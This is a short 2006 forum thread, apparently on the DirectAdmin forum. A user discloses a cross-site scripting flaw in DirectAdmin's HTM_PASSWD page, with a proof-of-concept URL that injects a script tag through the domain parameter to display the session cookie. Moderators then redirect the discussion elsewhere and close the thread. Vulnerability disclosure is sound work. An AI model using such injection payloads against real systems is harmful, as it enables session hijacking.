PDA

View Full Version : XSS Attack On DirectAdmin


AKIN
04-30-2006, 04:25 AM
? Tested On: http://www.directadmin.com/demo.html



? Proof of Concept:

LOCAL XSS attack:

http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(document.cookie)</script><!--





?Solution:

?contact advisory@aria-security.net
Aspegic
04-30-2006, 04:40 AM
This topic is being discussed in this thread:
http://www.directadmin.com/forum/showthread.php?s=&threadid=13152

To prevent information on this topic from being scattered throughout the forum I recommend to continue the discussion in the other thread.

Thanks!
nobaloney
04-30-2006, 08:11 AM
This thread is now closed. Please use the other thread for any continued discussion.

Jeff